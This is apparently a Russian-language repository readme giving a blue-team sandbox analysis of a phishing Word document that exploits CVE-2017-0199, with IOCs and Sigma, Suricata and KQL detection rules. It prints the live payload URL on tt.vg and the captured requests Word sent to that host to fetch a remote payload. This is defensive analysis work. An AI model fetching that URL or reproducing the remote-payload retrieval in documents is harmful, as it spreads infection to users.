Назад к обновлениям
UpdatedJul 28, 2026

RCE-CVE-2017-0199-detection-analysis — Updated!

Этот репозиторий содержит полный анализ вредоносного ПО с точки зрения blue team реального вредоносного DOCX, эксплуатирующего CVE-2017-0199. Лабораторная работа включает выполнение в песочнице, сетевую криминалистику, извлечение IOC, сопоставление с MITRE ATT&CK, проверку сброшенных файлов и правила обнаружения. Скриншоты доказательств включены в папку evidence для профессиональной документации.

Поделиться

🛡️ BankPaymAdviceVend.Report.docx CVE-2017-0199 – Полный анализ в песочнице (Blue Team)

Детонация сложного вредоносного ПО • Поведение эксплойта • IOCs • Инженерия обнаружения



🎯 1. Краткое резюме

Этот репозиторий документирует **реальный вредоносный DOCX**-файл, эксплуатирующий уязвимость **CVE-2017-0199** Microsoft Office (RCE). Образец был детонирован в песочнице **Windows 10 ANY.RUN**, что позволило выявить:

✔ Полную цепочку эксплуатации
✔ Сетевые колбэки на вредоносный домен (tt.vg)
✔ Сброшенные файлы и временные артефакты
✔ JA3-отпечатки
✔ Активность в реестре
✔ HTTP/HTTPS-биконинг от WINWORD.EXE
✔ Полный набор IOCs и правил обнаружения для Blue Team


🔍 2. Предыстория сценария

Документ под названием «BankPaymAdviceVend.Report.docx» был получен через фишинговое письмо.
После детонации ANY.RUN мгновенно пометил его как вредоносный и связал с:

  • Эксплойтом CVE-2017-0199 (RCE в Word)
  • Скрытыми HTTP/HTTPS-соединениями от WINWORD.EXE
  • Обращением к вредоносному короткому домену tt.vg
  • Попыткой получения удалённой полезной нагрузки /BVhaS


📄 3. Информация об образце

ПолеЗначение
ФайлBankPaymAdviceVend.Report.docx
ВердиктВредоносная активность
Тегиcve-2017-0199, exploit
MD522EDED727467A9A26F3FD311A12A7E
SHA16738D1A969193459C7C7579956269D77FED8D26F
SHA2562E1408013503C...3D6EAF9
ПесочницаWindows 10 Pro x64
ПоведениеЭксплойт → Сетевой биконинг → Сброшенные файлы

🧬 4. Цепочка атаки (схема высокого уровня)

[ Вредоносный DOCX ] │ ▼ [ Пользователь открывает в Word ] │ ▼ [ Срабатывание эксплойта CVE-2017-0199 ] │ ▼ [WINWORD.EXE → tt.vg через HTTP/HTTPS] │ ▼ [Удалённый путь: /BVhaS (GET / HEAD / OPTIONS)] │ ▼ [Сброшены временные файлы, EMF-объекты, файлы кэша] │ ▼ [Потенциальная полезная нагрузка следующего этапа — сервер вернул 404]

yaml Copy code


🌐 5. Сетевое поведение

5.1 DNS-запросы

Только один домен был вредоносным:

ДоменРепутация
tt.vg🔴 вредоносный

Разрешённые IP-адреса:

188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2)

yaml Copy code


📡 5.2 HTTP/HTTPS-биконинг

Word пытался получить:

GET /BVhaS HEAD /BVhaS OPTIONS / Host: tt.vg User-Agent: Microsoft Office / MSIE 7 spoof

yaml Copy code

Типичный перехваченный запрос:

GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg

arduino Copy code

Сервер ответил:

HTTP/1.1 404 Not Found

yaml Copy code


📁 6. Сброшенные файлы

Примечательные артефакты

  • Несколько .tmp-файлов
  • Графические объекты Office .glox
  • EMF-изображения в кэше браузера:
    %LOCALAPPDATA%\INetCache\Content.MSO\*.emf
  • Ярлык недавнего документа .LNK
  • Журналы index.dat
  • Изменения словарей проверки правописания Office

🔐 7. Активность в реестре и поведение в системе

Word обращался к:

HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces...

yaml Copy code

✔ Нормально для Office
❌ В сочетании с эксплойтом = явно вредоносное поведение


💣 8. Разбор эксплойта — CVE-2017-0199

Тип: Удалённое выполнение кода (RCE)
Триггер: Вредоносный DOCX загружает удалённый HTA без взаимодействия с пользователем
Затронутые версии: Microsoft Word 2007–2016
Воздействие: Злоумышленник выполняет произвольный код

Этот образец пытается загрузить удалённую полезную нагрузку с:

http://tt.vg/BVhaS

yaml Copy code


🧩 9. IOCs (индикаторы компрометации)

🔥 9.1 Сетевые индикаторы

Домен: tt.vg

URL-адреса: http://tt.vg/BVhaS https://tt.vg/BVhaS

IP-адреса: 188.114.96.3 188.114.97.3 172.67.138.42

shell Copy code

🔐 9.2 JA3 SSL-отпечатки

091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ...

yaml Copy code


🔍 10. Идеи для обнаружения (Sigma / Suricata / EDR)

Этот раздел преобразует технический анализ BankPaymAdviceVend.Report.docx в практические, готовые к развёртыванию артефакты обнаружения, которые SOC или Blue Team могут сразу же использовать. В него входят правила Sigma, сигнатуры Suricata IDS и поисковые запросы EDR.


🧾 10.1 Правило Sigma — WINWORD → tt.vg

Это правило Sigma обнаруживает любое сетевое соединение, инициированное WINWORD.EXE с подозрительным коротким доменом tt.vg в журналах сети Windows.

title: WINWORD Connecting To Suspicious Short Domain tt.vg
id: 0b2a5f3d-ttvg-word
status: experimental

logsource:
  category: network_connection
  product: windows

detection:
  selection:
    Image|endswith: '\WINWORD.EXE'
    DestinationHostname: 'tt.vg'
  condition: selection

level: high
tags:
  - attack.command_and_control
  - attack.t1071.001
  - cve.2017-0199

💡 Любая устаревшая система Office, связывающаяся с tt.vg через WINWORD.EXE, должна незамедлительно запускать расследование.


🌐 10.2 Правило Suricata — HTTP GET /BVhaS на tt.vg

Правило Suricata IDS, которое выявляет исходящий от Office запрос GET /BVhaS на вредоносный домен tt.vg. Это фиксирует попытку эксплойта получить полезную нагрузку.

alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";
    flow:established,to_server;
    http.method; content:"GET";
    http.uri; content:"/BVhaS"; nocase;
    http.host; content:"tt.vg"; nocase;
    http.user_agent; content:"MSOffice"; nocase;
    reference:cve,2017-0199;
    classtype:trojan-activity;
    sid:4200010;
    rev:1;
)

🔥 Высокоэффективно в средах, использующих Suricata или Zeek для мониторинга исходящего трафика.


🛰️ 10.3 Поисковый запрос EDR — индикаторы WINWORD + tt.vg

Поисковый запрос KQL (Microsoft Defender), используемый для выявления любой машины в среде, демонстрирующей аналогичный вредоносный биконинг на tt.vg или связанные с ним IP-адреса.

DeviceNetworkEvents
| where InitiatingProcessFileName == "WINWORD.EXE"
| where RemoteUrl in ("tt.vg")
   or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")

🎯 Цель: расширить одиночную детонацию в песочнице до полномасштабного поиска по всему предприятию.


🧩 11. Что демонстрирует эта лабораторная работа

Эта лабораторная работа демонстрирует вашу способность анализировать реальный фишинговый DOCX-образец от начала до конца, следуя полной методологии уровня SOC:

  • Понимание того, как CVE-2017-0199 срабатывает внутри Microsoft Word.
  • Отслеживание того, как WINWORD.EXE становится неожиданным HTTP/S-клиентом.
  • Извлечение сетевых IOCs (домены, URL-адреса, IP-адреса, JA3 TLS-хеши).
  • Анализ сброшенных файлов, недавних ярлыков и обращений к реестру для криминалистической ценности.
  • Преобразование всех результатов в Sigma, Suricata и поисковые запросы EDR.

Иными словами — эта лабораторная работа не останавливается на детонации. Она извлекает реальные, практически применимые данные для обнаружения точно так же, как профессиональный аналитик SOC.


Разработано и задокументировано Ahmed Tarek — Blue Team

Категории